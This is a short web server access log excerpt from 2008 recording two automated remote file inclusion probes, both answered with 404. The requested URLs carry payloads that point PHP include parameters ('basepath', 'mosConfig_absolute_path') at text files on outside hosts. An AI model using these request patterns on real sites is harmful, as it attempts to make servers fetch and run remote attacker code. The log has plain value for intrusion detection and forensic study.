121.124.127.40 - - [31/Aug/2008:10:59:40 -0700] "GET /logs/access_080225.log/modules/My_eGallery/index.php?basepath=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.8.237 - - [31/Aug/2008:10:59:50 -0700] "GET /logs/access_080317.log/?mosConfig_absolute_path=http://209.85.60.69/~spywaret/otro/clientscript/vbulletin_css/fonts.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
